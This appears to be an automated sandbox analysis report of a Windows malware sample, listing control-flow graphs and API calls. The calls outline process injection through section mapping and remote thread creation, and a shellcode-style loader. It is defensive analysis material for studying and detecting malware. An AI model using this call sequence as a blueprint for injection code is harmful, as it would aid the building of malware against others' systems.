                                                                      execution_graph 3355 402e40 3357 402e37 3355->3357 3358 402edf 3357->3358 3359 4018e6 3357->3359 3360 4018f5 3359->3360 3361 40192e Sleep 3360->3361 3362 401949 3361->3362 3364 40195a 3362->3364 3365 401514 3362->3365 3364->3358 3366 401524 3365->3366 3367 4015c4 NtDuplicateObject 3366->3367 3371 4016e0 3366->3371 3368 4015e1 NtCreateSection 3367->3368 3367->3371 3369 401661 NtCreateSection 3368->3369 3370 401607 NtMapViewOfSection 3368->3370 3369->3371 3373 40168d 3369->3373 3370->3369 3372 40162a NtMapViewOfSection 3370->3372 3371->3364 3372->3369 3374 401648 3372->3374 3373->3371 3375 401697 NtMapViewOfSection 3373->3375 3374->3369 3375->3371 3376 4016be NtMapViewOfSection 3375->3376 3376->3371 3377 4177a0 3380 4173e0 3377->3380 3379 4177a5 3381 4173ed 3380->3381 3382 4174a7 InterlockedExchangeAdd ReadConsoleA FindAtomW GetConsoleFontSize SearchPathW 3381->3382 3385 4175e0 3381->3385 3384 41750b 7 API calls 3382->3384 3383 4175f0 SetCommState 3383->3385 3386 4175c1 3384->3386 3387 4175b8 GetBoundsRect 3384->3387 3385->3383 3388 417609 3385->3388 3389 4175d1 3386->3389 3390 4175ca PulseEvent 3386->3390 3387->3386 3391 417612 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA 3388->3391 3392 417647 3388->3392 3389->3385 3390->3389 3391->3392 3402 417020 LocalAlloc 3392->3402 3396 4176dd 3404 417340 3396->3404 3397 417684 LoadLibraryA 3403 417050 GetModuleHandleW GetProcAddress VirtualProtect 3397->3403 3399 4176e2 3400 417719 InterlockedDecrement 3399->3400 3401 41772f 3399->3401 3400->3399 3401->3379 3402->3397 3403->3396 3405 417369 QueryDosDeviceA 3404->3405 3406 41737a 3404->3406 3405->3406 3415 4171e0 3406->3415 3409 417395 3418 417220 3409->3418 3410 41738d FreeEnvironmentStringsA 3410->3409 3413 4173c3 3413->3399 3414 4173ac HeapDestroy GetNumaProcessorNode 3414->3413 3416 4171f1 FatalAppExitA GetModuleHandleW 3415->3416 3417 417203 3415->3417 3416->3417 3417->3409 3417->3410 3419 41722d 3418->3419 3420 417259 3419->3420 3421 417248 BuildCommDCBA 3419->3421 3422 417261 WritePrivateProfileStringA FreeEnvironmentStringsA 3420->3422 3425 417283 3420->3425 3421->3425 3422->3425 3424 41730a 3424->3413 3424->3414 3425->3424 3426 4172b9 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3425->3426 3427 417210 3425->3427 3426->3425 3430 4171a0 3427->3430 3431 4171c9 3430->3431 3432 4171bc SetEvent 3430->3432 3431->3425 3432->3431 3528 4176a3 3529 4176b0 LoadLibraryA 3528->3529 3537 417050 GetModuleHandleW GetProcAddress VirtualProtect 3529->3537 3532 4176dd 3533 417340 15 API calls 3532->3533 3534 4176e2 3533->3534 3535 417719 InterlockedDecrement 3534->3535 3536 41772f 3534->3536 3535->3534 3537->3532 3538 401542 3539 40153b 3538->3539 3540 4015c4 NtDuplicateObject 3539->3540 3544 4016e0 3539->3544 3541 4015e1 NtCreateSection 3540->3541 3540->3544 3542 401661 NtCreateSection 3541->3542 3543 401607 NtMapViewOfSection 3541->3543 3542->3544 3546 40168d 3542->3546 3543->3542 3545 40162a NtMapViewOfSection 3543->3545 3545->3542 3547 401648 3545->3547 3546->3544 3548 401697 NtMapViewOfSection 3546->3548 3547->3542 3548->3544 3549 4016be NtMapViewOfSection 3548->3549 3549->3544 3502 2cf0005 3507 2cf092b GetPEB 3502->3507 3504 2cf0030 3509 2cf003c 3504->3509 3508 2cf0972 3507->3508 3508->3504 3510 2cf0049 3509->3510 3511 2cf0e0f 2 API calls 3510->3511 3512 2cf0223 3511->3512 3513 2cf0d90 GetPEB 3512->3513 3514 2cf0238 VirtualAlloc 3513->3514 3515 2cf0265 3514->3515 3516 2cf02ce VirtualProtect 3515->3516 3518 2cf030b 3516->3518 3517 2cf0439 VirtualFree 3521 2cf04be LoadLibraryA 3517->3521 3518->3517 3520 2cf08c7 3521->3520 3522 2cf0001 3523 2cf0005 3522->3523 3524 2cf092b GetPEB 3523->3524 3525 2cf0030 3524->3525 3526 2cf003c 7 API calls 3525->3526 3527 2cf0038 3526->3527 3597 402dd0 3598 402ddc 3597->3598 3599 4018e6 8 API calls 3598->3599 3600 402edf 3598->3600 3599->3600 3483 4018f1 3484 4018f6 3483->3484 3485 40192e Sleep 3484->3485 3486 401949 3485->3486 3487 401514 7 API calls 3486->3487 3488 40195a 3486->3488 3487->3488 3433 2cf003c 3434 2cf0049 3433->3434 3446 2cf0e0f SetErrorMode SetErrorMode 3434->3446 3439 2cf0265 3440 2cf02ce VirtualProtect 3439->3440 3442 2cf030b 3440->3442 3441 2cf0439 VirtualFree 3445 2cf04be LoadLibraryA 3441->3445 3442->3441 3444 2cf08c7 3445->3444 3447 2cf0223 3446->3447 3448 2cf0d90 3447->3448 3449 2cf0dad 3448->3449 3450 2cf0dbb GetPEB 3449->3450 3451 2cf0238 VirtualAlloc 3449->3451 3450->3451 3451->3439 3452 2c10114 3453 2c10123 3452->3453 3456 2c108b4 3453->3456 3457 2c108cf 3456->3457 3458 2c108d8 CreateToolhelp32Snapshot 3457->3458 3459 2c108f4 Module32First 3457->3459 3458->3457 3458->3459 3460 2c10903 3459->3460 3462 2c1012c 3459->3462 3463 2c10573 3460->3463 3464 2c1059e 3463->3464 3465 2c105af VirtualAlloc 3464->3465 3466 2c105e7 3464->3466 3465->3466 3584 401915 3585 4018c6 3584->3585 3586 40191a 3584->3586 3587 40192e Sleep 3586->3587 3588 401949 3587->3588 3589 401514 7 API calls 3588->3589 3590 40195a 3588->3590 3589->3590 3467 402f97 3468 4030ee 3467->3468 3469 402fc1 3467->3469 3469->3468 3470 40307c RtlCreateUserThread NtTerminateProcess 3469->3470 3470->3468 3574 402d7b 3575 402d38 3574->3575 3575->3574 3576 402dc7 3575->3576 3577 4018e6 8 API calls 3575->3577 3577->3576 3489 4014fe 3490 401506 3489->3490 3491 401531 3489->3491 3492 4015c4 NtDuplicateObject 3491->3492 3493 4016e0 3491->3493 3492->3493 3494 4015e1 NtCreateSection 3492->3494 3495 401661 NtCreateSection 3494->3495 3496 401607 NtMapViewOfSection 3494->3496 3495->3493 3498 40168d 3495->3498 3496->3495 3497 40162a NtMapViewOfSection 3496->3497 3497->3495 3501 401648 3497->3501 3498->3493 3499 401697 NtMapViewOfSection 3498->3499 3499->3493 3500 4016be NtMapViewOfSection 3499->3500 3500->3493 3501->3495

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 155 401514-401533 157 401524-40152f 155->157 158 401536-40156e call 401193 155->158 157->158 167 401570 158->167 168 401573-401578 158->168 167->168 170 401898-4018a0 168->170 171 40157e-40158f 168->171 170->168 176 4018a5-4018b7 170->176 174 401595-4015be 171->174 175 401896 171->175 174->175 184 4015c4-4015db NtDuplicateObject 174->184 175->176 182 4018c5 176->182 183 4018bc-4018e3 call 401193 176->183 182->183 184->175 187 4015e1-401605 NtCreateSection 184->187 189 401661-401687 NtCreateSection 187->189 190 401607-401628 NtMapViewOfSection 187->190 189->175 193 40168d-401691 189->193 190->189 192 40162a-401646 NtMapViewOfSection 190->192 192->189 195 401648-40165e 192->195 193->175 196 401697-4016b8 NtMapViewOfSection 193->196 195->189 196->175 198 4016be-4016da NtMapViewOfSection 196->198 198->175 199 4016e0 call 4016e5 198->199
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd
                                                                      Similarity
                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                      • String ID:
                                                                      • API String ID: 1546783058-0
                                                                      • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                      • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                                                      • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                                                      • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 202 4014fe-401503 203 401531-40156e call 401193 202->203 204 401506-401511 202->204 214 401570 203->214 215 401573-401578 203->215 214->215 217 401898-4018a0 215->217 218 40157e-40158f 215->218 217->215 223 4018a5-4018b7 217->223 221 401595-4015be 218->221 222 401896 218->222 221->222 231 4015c4-4015db NtDuplicateObject 221->231 222->223 229 4018c5 223->229 230 4018bc-4018e3 call 401193 223->230 229->230 231->222 234 4015e1-401605 NtCreateSection 231->234 236 401661-401687 NtCreateSection 234->236 237 401607-401628 NtMapViewOfSection 234->237 236->222 240 40168d-401691 236->240 237->236 239 40162a-401646 NtMapViewOfSection 237->239 239->236 242 401648-40165e 239->242 240->222 243 401697-4016b8 NtMapViewOfSection 240->243 242->236 243->222 245 4016be-4016da NtMapViewOfSection 243->245 245->222 246 4016e0 call 4016e5 245->246
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd
                                                                      Similarity
                                                                      • API ID: Section$CreateDuplicateObjectView
                                                                      • String ID:
                                                                      • API String ID: 1652636561-0
                                                                      • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                      • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                      • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                                                      • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 249 401542-40156e call 401193 258 401570 249->258 259 401573-401578 249->259 258->259 261 401898-4018a0 259->261 262 40157e-40158f 259->262 261->259 267 4018a5-4018b7 261->267 265 401595-4015be 262->265 266 401896 262->266 265->266 275 4015c4-4015db NtDuplicateObject 265->275 266->267 273 4018c5 267->273 274 4018bc-4018e3 call 401193 267->274 273->274 275->266 278 4015e1-401605 NtCreateSection 275->278 280 401661-401687 NtCreateSection 278->280 281 401607-401628 NtMapViewOfSection 278->281 280->266 284 40168d-401691 280->284 281->280 283 40162a-401646 NtMapViewOfSection 281->283 283->280 286 401648-40165e 283->286 284->266 287 401697-4016b8 NtMapViewOfSection 284->287 286->280 287->266 289 4016be-4016da NtMapViewOfSection 287->289 289->266 290 4016e0 call 4016e5 289->290
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd
                                                                      Similarity
                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                      • String ID:
                                                                      • API String ID: 1546783058-0
                                                                      • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                      • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                      • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                      • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 293 401549-40156e call 401193 297 401570 293->297 298 401573-401578 293->298 297->298 300 401898-4018a0 298->300 301 40157e-40158f 298->301 300->298 306 4018a5-4018b7 300->306 304 401595-4015be 301->304 305 401896 301->305 304->305 314 4015c4-4015db NtDuplicateObject 304->314 305->306 312 4018c5 306->312 313 4018bc-4018e3 call 401193 306->313 312->313 314->305 317 4015e1-401605 NtCreateSection 314->317 319 401661-401687 NtCreateSection 317->319 320 401607-401628 NtMapViewOfSection 317->320 319->305 323 40168d-401691 319->323 320->319 322 40162a-401646 NtMapViewOfSection 320->322 322->319 325 401648-40165e 322->325 323->305 326 401697-4016b8 NtMapViewOfSection 323->326 325->319 326->305 328 4016be-4016da NtMapViewOfSection 326->328 328->305 329 4016e0 call 4016e5 328->329
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd
                                                                      Similarity
                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                      • String ID:
                                                                      • API String ID: 1546783058-0
                                                                      • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                      • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                      • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                      • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 332 401557 333 40155b-40156e call 401193 332->333 334 40154f-401554 332->334 337 401570 333->337 338 401573-401578 333->338 334->333 337->338 340 401898-4018a0 338->340 341 40157e-40158f 338->341 340->338 346 4018a5-4018b7 340->346 344 401595-4015be 341->344 345 401896 341->345 344->345 354 4015c4-4015db NtDuplicateObject 344->354 345->346 352 4018c5 346->352 353 4018bc-4018e3 call 401193 346->353 352->353 354->345 357 4015e1-401605 NtCreateSection 354->357 359 401661-401687 NtCreateSection 357->359 360 401607-401628 NtMapViewOfSection 357->360 359->345 363 40168d-401691 359->363 360->359 362 40162a-401646 NtMapViewOfSection 360->362 362->359 365 401648-40165e 362->365 363->345 366 401697-4016b8 NtMapViewOfSection 363->366 365->359 366->345 368 4016be-4016da NtMapViewOfSection 366->368 368->345 369 4016e0 call 4016e5 368->369
                                                                      APIs
                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd
                                                                      Similarity
                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                      • String ID:
                                                                      • API String ID: 1546783058-0
                                                                      • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                      • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                      • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                      • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 401 402f97-402fbb 402 402fc1-402fd9 401->402 403 4030ee-4030f3 401->403 402->403 404 402fdf-402ff0 402->404 405 402ff2-402ffb 404->405 406 403000-40300e 405->406 406->406 407 403010-403017 406->407 408 403039-403040 407->408 409 403019-40301c 407->409 410 403042-403044 408->410 412 403062-403065 408->412 409->410 411 40301e-403027 409->411 413 403045 410->413 411->413 414 403029-403038 411->414 415 403067-40306a 412->415 416 40306e 412->416 417 403047-403061 413->417 418 40306b-40306c 413->418 414->408 415->416 415->418 416->405 419 40306f 416->419 417->412 420 403070-403075 418->420 419->420 420->403 421 403077-40307a 420->421 421->403 422 40307c-4030eb RtlCreateUserThread NtTerminateProcess 421->422 422->403
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2507813161.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_fbtdajh.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcessTerminateThreadUser
                                                                      • String ID:
                                                                      • API String ID: 1921587553-0
                                                                      • Opcode ID: c5436c7e7e6e3e410a730c8ca40359fc9cb55dc58de8f82c61b8b97930139c1a
                                                                      • Instruction ID: 181ab879d947f068327b1ec0ddd27223b5b0ac2a90c427e8f19d47aa25efb225
                                                                      • Opcode Fuzzy Hash: c5436c7e7e6e3e410a730c8ca40359fc9cb55dc58de8f82c61b8b97930139c1a
                                                                      • Instruction Fuzzy Hash: 67417631228E0C4FD3A8DF2CA845BA277D5FB94311F6643AAE809D3389FA74C80183C5

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 4173e0-417408 2 417410-417417 0->2 3 417419-41741b 2->3 4 41741f-417425 2->4 3->4 5 417427-417431 4->5 6 417436-417440 4->6 5->6 7 417442-41744e 6->7 8 417458-41745f 6->8 7->8 8->2 9 417461-417469 8->9 11 417470-417476 9->11 12 417484-41748b 11->12 13 417478-41747e 11->13 14 417491-417498 12->14 15 41748d 12->15 13->12 14->11 16 41749a-4174a1 14->16 15->14 17 4175e0-4175ee 16->17 18 4174a7-4175b6 InterlockedExchangeAdd ReadConsoleA FindAtomW GetConsoleFontSize SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 4175f0-4175fe SetCommState 17->19 22 4175c1-4175c8 18->22 23 4175b8-4175bb GetBoundsRect 18->23 24 417600-417607 19->24 25 417609-417610 19->25 26 4175d1-4175dd 22->26 27 4175ca-4175cb PulseEvent 22->27 23->22 24->19 24->25 28 417612-417679 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA 25->28 29 41767f-41768e call 417020 25->29 26->17 27->26 28->29 34 417690-4176a1 29->34 35 4176cd-4176d8 LoadLibraryA call 417050 29->35 39 4176b0-4176c0 34->39 40 4176dd-4176ee call 417340 35->40 41 4176c2 39->41 42 4176c8-4176cb 39->42 46 4176f0-4176f7 40->46 41->42 42->35 42->39 48 417703-417709 46->48 49 4176f9-4176ff 46->49 50 417710-417717 48->50 51 41770b call 417040 48->51 49->48 55 417726-41772d 50->55 56 417719-417720 InterlockedDecrement 50->56 51->50 55->46 58 41772f-41773f 55->58 56->55 59 417740-417750 58->59 60 417752 59->60 61 417759-41775c 59->61 60->61 61->59 63 41775e-417769 61->63 64 417770-417775 63->64 66 417777-41777d 64->66 67 41777f-417785 64->67 66->67 68 417787-417794 66->68 67->64 67->68
                                                                      APIs
                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004174B0
                                                                      • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 004174C9
                                                                      • FindAtomW.KERNEL32(00000000), ref: 004174D0
                                                                      • GetConsoleFontSize.KERNEL32(00000000,00000000), ref: 004174D8
                                                                      • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 004174F0
                                                                      • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00417517
                                                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 0041751F
                                                                      • GetVersionExW.KERNEL32(?), ref: 0041752C
                                                                      • DisconnectNamedPipe.KERNEL32(?), ref: 0041753F
                                                                      • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00417584
                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00417593
                                                                      • LCMapStringA.KERNEL32(00000000,00000000,004193C8,00000000,?,00000000), ref: 004175A9
                                                                      • GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 004175BB
                                                                      • PulseEvent.KERNEL32(00000000), ref: 004175CB
                                                                      • SetCommState.KERNELBASE(00000000,00000000), ref: 004175F4
                                                                      • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00417621
                                                                      • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00417632
                                                                      • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 0041763A
                                                                      • LoadLibraryA.KERNELBASE(004193F8), ref: 004176D2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2507834820.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_40b000_fbtdajh.jbxd
                                                                      Similarity
                                                                      • API ID: Console$Comm$FileReadString$AliasesAtomBoundsBuildConfigDefaultDisconnectEventExchangeFindFontInterlockedLengthLibraryLoadModuleMoveNameNamedOutputPathPipePulseRectSearchSizeStateTypeVersion
                                                                      • String ID: k`$}$
                                                                      • API String ID: 2183200751-956986773
                                                                      • Opcode ID: ddd81308ca95ea6083750847ef12a8dd7c988e9d9fcdb0e85733d7453e5142f1
                                                                      • Instruction ID: 4b0af0e3fa1ca4ab076df1e70508018619d961bc3f3b7d37d78c72f8efd93fb6
                                                                      • Opcode Fuzzy Hash: ddd81308ca95ea6083750847ef12a8dd7c988e9d9fcdb0e85733d7453e5142f1
                                                                      • Instruction Fuzzy Hash: CE911371845524ABC720AB65EC44ADF7F79EF4E351F01406EF50AA3190CB381A85CFAD

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 70 2cf003c-2cf0047 71 2cf004c-2cf0263 call 2cf0a3f call 2cf0e0f call 2cf0d90 VirtualAlloc 70->71 72 2cf0049 70->72 87 2cf028b-2cf0292 71->87 88 2cf0265-2cf0289 call 2cf0a69 71->88 72->71 90 2cf02a1-2cf02b0 87->90 92 2cf02ce-2cf03c2 VirtualProtect call 2cf0cce call 2cf0ce7 88->92 90->92 93 2cf02b2-2cf02cc 90->93 99 2cf03d1-2cf03e0 92->99 93->90 100 2cf0439-2cf04b8 VirtualFree 99->100 101 2cf03e2-2cf0437 call 2cf0ce7 99->101 103 2cf04be-2cf04cd 100->103 104 2cf05f4-2cf05fe 100->104 101->99 106 2cf04d3-2cf04dd 103->106 107 2cf077f-2cf0789 104->107 108 2cf0604-2cf060d 104->108 106->104 111 2cf04e3-2cf0505 106->111 112 2cf078b-2cf07a3 107->112 113 2cf07a6-2cf07b0 107->113 108->107 109 2cf0613-2cf0637 108->109 114 2cf063e-2cf0648 109->114 124 2cf0517-2cf0520 111->124 125 2cf0507-2cf0515 111->125 112->113 115 2cf086e-2cf08be LoadLibraryA 113->115 116 2cf07b6-2cf07cb 113->116 114->107 118 2cf064e-2cf065a 114->118 123 2cf08c7-2cf08f9 115->123 117 2cf07d2-2cf07d5 116->117 120 2cf07d7-2cf07e0 117->120 121 2cf0824-2cf0833 117->121 118->107 122 2cf0660-2cf066a 118->122 127 2cf07e4-2cf0822 120->127 128 2cf07e2 120->128 130 2cf0839-2cf083c 121->130 129 2cf067a-2cf0689 122->129 131 2cf08fb-2cf0901 123->131 132 2cf0902-2cf091d 123->132 126 2cf0526-2cf0547 124->126 125->126 133 2cf054d-2cf0550 126->133 127->117 128->121 134 2cf068f-2cf06b2 129->134 135 2cf0750-2cf077a 129->135 130->115 136 2cf083e-2cf0847 130->136 131->132 138 2cf0556-2cf056b 133->138 139 2cf05e0-2cf05ef 133->139 140 2cf06ef-2cf06fc 134->140 141 2cf06b4-2cf06ed 134->141 135->114 142 2cf084b-2cf086c 136->142 143 2cf0849 136->143 144 2cf056f-2cf057a 138->144 145 2cf056d 138->145 139->106 146 2cf06fe-2cf0748 140->146 147 2cf074b 140->147 141->140 142->130 143->115 148 2cf057c-2cf0599 144->148 149 2cf059b-2cf05bb 144->149 145->139 146->147 147->129 154 2cf05bd-2cf05db 148->154 149->154 154->133
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02CF024D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2509060579.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_2cf0000_fbtdajh.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: cess$kernel32.dll
                                                                      • API String ID: 4275171209-1230238691
                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                      • Instruction ID: f52d848a7eb621d3bcf27de12283cb4e466daf3c2a9a7caa30bfd242752cbc5a
                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                      • Instruction Fuzzy Hash: 83525B74A01229DFDBA4CF58C984BACBBB1BF09314F1480D9E54DAB356DB30AA85DF14

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
